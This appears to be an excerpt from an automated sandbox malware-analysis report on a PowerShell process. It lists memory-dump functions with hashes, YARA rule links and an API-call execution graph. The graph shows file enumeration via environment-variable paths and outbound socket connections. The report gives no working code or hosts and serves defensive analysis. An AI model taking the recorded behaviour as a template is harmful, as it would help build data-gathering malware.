                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73E04F34A14189CFCB54EF6AD5868ADBFF1FB0A300B004279E90AD7761CB315885CF81
                                                                                                                                                                                                          Function 0326B338 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 1a16455dd0911ea452b75bd70fd413e6ccd01e54fbe41d2a5b0d685ed2a349e2
                                                                                                                                                                                                          • Instruction ID: 8c4ffb1c9d4058ab3080bfb70bce258d0f07d07fbf5c8a529da4ebd34b6c03c5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a16455dd0911ea452b75bd70fd413e6ccd01e54fbe41d2a5b0d685ed2a349e2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69D0173480411E9BCB08EBA6E82A4BEBB74FB06201F40006EE907922D1EF201956CEC1
                                                                                                                                                                                                          Function 0326B400 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 2b85118e1ae7f53b5235db361d8cca0ab02b652e9cd90348c34bd3d24e482611
                                                                                                                                                                                                          • Instruction ID: 8f4c721c5f1eb712a41f3b1aaa850f3edab305343f1451e33cb75aae8f12b4f9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b85118e1ae7f53b5235db361d8cca0ab02b652e9cd90348c34bd3d24e482611
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FD012749141098FC744DF65D55646D7FB5EB45305F004178E90997340DA305841CBC1
                                                                                                                                                                                                          Function 0326F928 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: cb4214be6ca07aad82a5888abe382afb38233628737b48b91cd3b59673b28752
                                                                                                                                                                                                          • Instruction ID: 89847e97704b32778033cbbb08d49bccc73b6761c1cab4c6a6d056bed785e4d1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb4214be6ca07aad82a5888abe382afb38233628737b48b91cd3b59673b28752
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37C08C6014F3C10FC7234B3648501083FA8AD032A170A04DAE0C1CE0B3C828919DD32B
                                                                                                                                                                                                          Function 07731A7E Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 27c4189e4561a7f11fab34aba0ba076ee7d23283979afbd4e2a5efdfde371311
                                                                                                                                                                                                          • Instruction ID: 844fb7f82c7ea391defa8006829c46256ed6b3bce74834cedd44d02bf324356f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27c4189e4561a7f11fab34aba0ba076ee7d23283979afbd4e2a5efdfde371311
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0A01130200000ABC200CA00C8A2800B328AB80208B28C88AA8088F38ACF33EA038B00

                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                          Function 093D006D Relevance: 14.0, Strings: 11, Instructions: 286COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144033826196.00000000093D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093D0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_93d0000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$4'kq$tPkq$tPkq$tPkq$tPkq$$kq$(qq$(qq$(qq$(qq
                                                                                                                                                                                                          • API String ID: 0-610213911
                                                                                                                                                                                                          • Opcode ID: 59feebc8a42fed2c22d594a9741cc9cf43623c40a4cec827759fede2d42a1827
                                                                                                                                                                                                          • Instruction ID: 104333be4fed8ab1134141d25555dd56fbeec2be3ae2a5770050adb32d1bff18
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59feebc8a42fed2c22d594a9741cc9cf43623c40a4cec827759fede2d42a1827
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2A1CC36702105DFCB28CE58E5617AABBE6BF85710F248469E845AB385CB71DC41CFA1
                                                                                                                                                                                                          Function 0773F50D Relevance: 10.1, Strings: 8, Instructions: 122COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$4'kq$d%qq$d%qq$d%qq$d%qq$tPkq$tPkq
                                                                                                                                                                                                          • API String ID: 0-709841732
                                                                                                                                                                                                          • Opcode ID: 30f0e9cc2b3a1018248a3f613fdeb9226eebdd33a5ee527a79aa56e9c0ed6c6c
                                                                                                                                                                                                          • Instruction ID: 651b2c83f4a267a1a0726784e6f61cc6308c148fa7be049827005268c8a244db
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30f0e9cc2b3a1018248a3f613fdeb9226eebdd33a5ee527a79aa56e9c0ed6c6c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9941D9F0F00219DFC724DF588450A6ABBE2FF89794F2485A9D845AB396CB31DC41CB61
                                                                                                                                                                                                          Function 093D0AED Relevance: 7.7, Strings: 6, Instructions: 194COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144033826196.00000000093D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093D0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_93d0000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: XRpq$XRpq$XRpq$tPkq$tPkq$$kq
                                                                                                                                                                                                          • API String ID: 0-957243320
                                                                                                                                                                                                          • Opcode ID: a795fade8b224eb6569d32a7536741733127d0e8d96bad9c115efdcc3c851146
                                                                                                                                                                                                          • Instruction ID: f24d8da74822f2a195120b203785967818e2ae709aba9e8f1303022d6d678d5d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a795fade8b224eb6569d32a7536741733127d0e8d96bad9c115efdcc3c851146
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB61F636705105DFCB289F68E4606AABBE2BF85B14F24C46AE5429F294CB71DC41CFA1
                                                                                                                                                                                                          Function 07738178 Relevance: 7.7, Strings: 6, Instructions: 193COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: tPkq$tPkq$$kq$$kq$$kq$$kq
                                                                                                                                                                                                          • API String ID: 0-3142828793
                                                                                                                                                                                                          • Opcode ID: 7d97650bd4f966c7eaf19d66196cc0a6b0d7a27aef82e501bc06239c7260553e
                                                                                                                                                                                                          • Instruction ID: 621099e4ae40001b0bda3dc35432f9682528a119efdaa7395bb2b4cc99698822
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d97650bd4f966c7eaf19d66196cc0a6b0d7a27aef82e501bc06239c7260553e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7512DB1704346CFDB349A69C850B6ABBB2AFC1790F24887BF5459B293CA75D840C772
                                                                                                                                                                                                          Function 0773B280 Relevance: 7.6, Strings: 6, Instructions: 105COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                                                                                                                                                                                                          • API String ID: 0-1342094364
                                                                                                                                                                                                          • Opcode ID: 0dfbff8a8f4e8ff1445137762ec0621c31858efb79e52f2d6473175bd42b7e40
                                                                                                                                                                                                          • Instruction ID: 88874dfef29a8f7c4fcfa0dad10abfe22080949133e088b3594f636354e1f0ee
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0dfbff8a8f4e8ff1445137762ec0621c31858efb79e52f2d6473175bd42b7e40
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D13129F67142A7CBD7359A6A845027AB7A2EFC2291B24497FC081C76A7CF3DC4458352
                                                                                                                                                                                                          Function 07730538 Relevance: 6.4, Strings: 5, Instructions: 152COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$4'kq$$kq$$kq$$kq
                                                                                                                                                                                                          • API String ID: 0-1023320533
                                                                                                                                                                                                          • Opcode ID: b4cf6ecd7431d847f75f25a1f65fa3c1a7e17d8c2c07438481ac9943e22fe9b7
                                                                                                                                                                                                          • Instruction ID: 6037a4ac7b4ff0ed275691d071e9ae33fe245b3e018de656836d1dc553b3ab82
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4cf6ecd7431d847f75f25a1f65fa3c1a7e17d8c2c07438481ac9943e22fe9b7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E34119F5705345DFCB259B6888107BA7FA3AFC2290F1488AAD445CB697DF35C841C7A2
                                                                                                                                                                                                          Function 077323F8 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$4'kq$$kq$$kq$$kq
                                                                                                                                                                                                          • API String ID: 0-1023320533
                                                                                                                                                                                                          • Opcode ID: e28a2a845bbaf8df7ca64bb9849b19d00b33810865fff37aff7920e5d7957d6e
                                                                                                                                                                                                          • Instruction ID: 4f494c006dbcd6954890b575009e39ea62bb2fb7accf2a9999b6f959d845a877
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e28a2a845bbaf8df7ca64bb9849b19d00b33810865fff37aff7920e5d7957d6e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 674126F5700216DBDB398E69C410276B7A2BFC12A0B34C8BBD8558B297CB39CD41C761
                                                                                                                                                                                                          Function 0773F7B5 Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$4'kq$$kq$$kq$$kq
                                                                                                                                                                                                          • API String ID: 0-1023320533
                                                                                                                                                                                                          • Opcode ID: c01ad3179c4d9c88e48dc73ad624aab8b48ff0e8137f568ef4c41ad79bba5021
                                                                                                                                                                                                          • Instruction ID: fdf98a9e61e1de67ca7a6edbf1bd5b9da179f538d579ccbbf032133283aa1f8e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c01ad3179c4d9c88e48dc73ad624aab8b48ff0e8137f568ef4c41ad79bba5021
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 473146F6F04252CFCB388A6984502B6B7A2AF962D1B24487FD44587287DB39C442C761
                                                                                                                                                                                                          Function 07736F61 Relevance: 6.4, Strings: 5, Instructions: 111COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$4'kq$\\>j$\\>j$\\>j
                                                                                                                                                                                                          • API String ID: 0-2811065941
                                                                                                                                                                                                          • Opcode ID: d5b155fadb1764ecf20db33b56bf200e989605bf3b5b3147e13283539543402c
                                                                                                                                                                                                          • Instruction ID: 9cdd8b6c030b5eb8803a1d5dd0b65ae18eb22dfab86c1ab47afdc7f51c990b5a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5b155fadb1764ecf20db33b56bf200e989605bf3b5b3147e13283539543402c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 883193B120A3925FC726577888246AA3FB16F43290B1A08DBD5C0CF2E7CA185C46C7A7
                                                                                                                                                                                                          Function 0773F55E Relevance: 6.3, Strings: 5, Instructions: 85COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$d%qq$d%qq$d%qq$tPkq
                                                                                                                                                                                                          • API String ID: 0-1865534145
                                                                                                                                                                                                          • Opcode ID: 0d4bb28defb39cb729dc18a5b9aad8f1ebadda29de5ca461f00ede73ecb8d1ea
                                                                                                                                                                                                          • Instruction ID: d1a5a7a11b0c9844d8dcc14a57a4cba5810a9653eb49cf7fa34daa9096d7b437
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d4bb28defb39cb729dc18a5b9aad8f1ebadda29de5ca461f00ede73ecb8d1ea
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E31A2F1F00215DFC724CF54C450AAABBA2FB88394F25C599E945AB362CB31DC41CBA1
                                                                                                                                                                                                          Function 0773ED28 Relevance: 5.5, Strings: 4, Instructions: 492COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: (okq$(okq$(okq$(okq
                                                                                                                                                                                                          • API String ID: 0-1817140900
                                                                                                                                                                                                          • Opcode ID: cb2616f9993b586f0d6599b79e3c83dab579259dd2e44a23571dabab66155ef5
                                                                                                                                                                                                          • Instruction ID: 88ce57eb5cfc5ffb0aadafb379ceec995323d39d07c64267f86c0463fd6af790
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb2616f9993b586f0d6599b79e3c83dab579259dd2e44a23571dabab66155ef5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95F14BB5B04346DFDB24DF68D850BAA7BA1FF81390F14887AE4058B293DB75C841CB61
                                                                                                                                                                                                          Function 07733020 Relevance: 5.5, Strings: 4, Instructions: 474COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$4'kq$tPkq$tPkq
                                                                                                                                                                                                          • API String ID: 0-4290159910
                                                                                                                                                                                                          • Opcode ID: 92d8596af2b93c48eef0501818451f001700b0a34507b0dab57cee564d9af258
                                                                                                                                                                                                          • Instruction ID: 726647d69a80435d193f3acd4b1ca4751dedc4ca059837b7555a58d7523aed5f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92d8596af2b93c48eef0501818451f001700b0a34507b0dab57cee564d9af258
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84F1E4B5B00205DFDB24CB68C451AAABBF2FF85350F14C86AD8159F696CB35DC81CBA1
                                                                                                                                                                                                          Function 0773C142 Relevance: 5.5, Strings: 4, Instructions: 471COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$4'kq$4'kq$4'kq
                                                                                                                                                                                                          • API String ID: 0-1293621312
                                                                                                                                                                                                          • Opcode ID: 33a6176f6185c3b9dcf6053ff173c4d3269462eabe5d8247c7d10715fcef495b
                                                                                                                                                                                                          • Instruction ID: f7230f2a85cd9ef4bc0f8f1715d475b2a339b63a5a5fe09b52f30460874bc588
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33a6176f6185c3b9dcf6053ff173c4d3269462eabe5d8247c7d10715fcef495b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C32221B4A01218DFDB25DB64C850BD9BBB2FF85304F1088A9D8496B791CB35ED81CFA5
                                                                                                                                                                                                          Function 093D21D8 Relevance: 5.3, Strings: 4, Instructions: 259COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144033826196.00000000093D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093D0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_93d0000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: tPkq$tPkq$tPkq$tPkq
                                                                                                                                                                                                          • API String ID: 0-482761231
                                                                                                                                                                                                          • Opcode ID: cc33fa73c5812ce84f602e3e662b92a87ece39bb05c023e535fe7a964c7a8443
                                                                                                                                                                                                          • Instruction ID: 57247dc978e2be44ce4da232061817b99b76a4cbae988a845767c44a2ee7b2f5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc33fa73c5812ce84f602e3e662b92a87ece39bb05c023e535fe7a964c7a8443
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC919236B02214DFCB24DF98D46166BBBE2FFC9310B248469E9659B385CB71DC41CB91
                                                                                                                                                                                                          Function 07736E61 Relevance: 5.1, Strings: 4, Instructions: 96COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$4'kq$X#|i$h#|i
                                                                                                                                                                                                          • API String ID: 0-2932294330
                                                                                                                                                                                                          • Opcode ID: d48da5cb612abc73b8674eca27e03424cdac9da1e1a18432ffe571dd53272079
                                                                                                                                                                                                          • Instruction ID: 9848ca6cdada95ee3dbd1ad1160c5ecd840aca011223fb5c49874ad1834c703a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d48da5cb612abc73b8674eca27e03424cdac9da1e1a18432ffe571dd53272079
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B231F5F260D392AFC723522C48206A27FB16FD365071A05DBD584CF6A7C9658C49C7B3
                                                                                                                                                                                                          Function 0773A020 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: $kq$$kq$$kq$$kq
                                                                                                                                                                                                          • API String ID: 0-2881790790
                                                                                                                                                                                                          • Opcode ID: bdf0b0dc97257d251ad0eca0b56e6be2da2f5548140d2b0eae2d0718bdcdd171
                                                                                                                                                                                                          • Instruction ID: 057113bca6f3fa4fddfb4ccc001ca6285d767f21e245c30f671b3ab872c30898
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bdf0b0dc97257d251ad0eca0b56e6be2da2f5548140d2b0eae2d0718bdcdd171
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E213CB13102159BEB3895798841B6777D6ABC1390F25CC3AF5899B382ED7AD8408360
                                                                                                                                                                                                          Function 07730309 Relevance: 5.1, Strings: 4, Instructions: 54COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$4'kq$$kq$$kq
                                                                                                                                                                                                          • API String ID: 0-1727931526
                                                                                                                                                                                                          • Opcode ID: 226f1cad06663a7421a8a9c0d395c5fb86806b87d48cd1a80a0cf908f7d87bcd
                                                                                                                                                                                                          • Instruction ID: 7c6d9ebe5b0e3a6721c393b8debedad1d07869077a3499be95cf8227b968ecf8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 226f1cad06663a7421a8a9c0d395c5fb86806b87d48cd1a80a0cf908f7d87bcd
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7601B56130A7C55FC32A526855201B67FB3AF8369072944EFC080CFA97C91D4C46C3A7

                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                          Execution Coverage:5.4%
                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                          Signature Coverage:9.2%
                                                                                                                                                                                                          Total number of Nodes:812
                                                                                                                                                                                                          Total number of Limit Nodes:30
                                                                                                                                                                                                          execution_graph 21371 214dad8d 21372 214dad9b 21371->21372 21373 214dad96 21371->21373 21377 214dac67 21372->21377 21389 214db15b GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 21373->21389 21376 214dada9 21378 214dac73 21377->21378 21379 214dac82 21378->21379 21383 214dac97 21378->21383 21394 214daa85 58 API calls 21378->21394 21379->21376 21383->21379 21390 214d6e40 21383->21390 21384 214dacf9 21384->21379 21396 214daa85 58 API calls 21384->21396 21386 214d6e40 12 API calls 21387 214dacef 21386->21387 21395 214daa85 58 API calls 21387->21395 21389->21372 21391 214d6e4e 21390->21391 21392 214d6e49 21390->21392 21391->21384 21391->21386 21397 214d7240 12 API calls 21392->21397 21394->21383 21395->21384 21396->21379 21398 214d72d7 21397->21398 21398->21391 21399 21de1c5b 21400 21de1c6b 21399->21400 21403 21de12ee 21400->21403 21402 21de1c87 21404 21de1324 21403->21404 21405 21de13b7 GetEnvironmentVariableW 21404->21405 21429 21de10f1 21405->21429 21408 21de10f1 57 API calls 21409 21de1465 21408->21409 21410 21de10f1 57 API calls 21409->21410 21411 21de1479 21410->21411 21412 21de10f1 57 API calls 21411->21412 21413 21de148d 21412->21413 21414 21de10f1 57 API calls 21413->21414 21415 21de14a1 21414->21415 21416 21de10f1 57 API calls 21415->21416 21417 21de14b5 lstrlenW 21416->21417 21418 21de14d9 lstrlenW 21417->21418 21419 21de14d2 21417->21419 21420 21de10f1 57 API calls 21418->21420 21419->21402 21421 21de1501 lstrlenW lstrcatW 21420->21421 21422 21de10f1 57 API calls 21421->21422 21423 21de1539 lstrlenW lstrcatW 21422->21423 21424 21de10f1 57 API calls 21423->21424 21425 21de156b lstrlenW lstrcatW 21424->21425 21426 21de10f1 57 API calls 21425->21426 21427 21de159d lstrlenW lstrcatW 21426->21427 21428 21de10f1 57 API calls 21427->21428 21428->21419 21430 21de1118 21429->21430 21431 21de1129 lstrlenW 21430->21431 21442 21de2c40 21431->21442 21434 21de1168 lstrlenW 21435 21de1177 lstrlenW FindFirstFileW 21434->21435 21436 21de11a0 21435->21436 21437 21de11e1 21435->21437 21438 21de11aa 21436->21438 21439 21de11c7 FindNextFileW 21436->21439 21437->21408 21438->21439 21444 21de1000 57 API calls 21438->21444 21439->21436 21440 21de11da FindClose 21439->21440 21440->21437 21443 21de1148 lstrcatW lstrlenW 21442->21443 21443->21434 21443->21435 21444->21438 21445 214d85d8 21446 214d85e1 21445->21446 21447 214d85e3 getaddrinfo 21445->21447 21446->21447 21448 214d85fa FormatMessageA 21447->21448 21452 214d8642 21447->21452 21449 214d862a 21448->21449 21458 214d84c0 70 API calls 21449->21458 21450 214d8688 FreeAddrInfoW 21451 214d8650 socket 21451->21452 21453 214d8666 connect 21451->21453 21452->21450 21452->21451 21456 214d8685 21452->21456 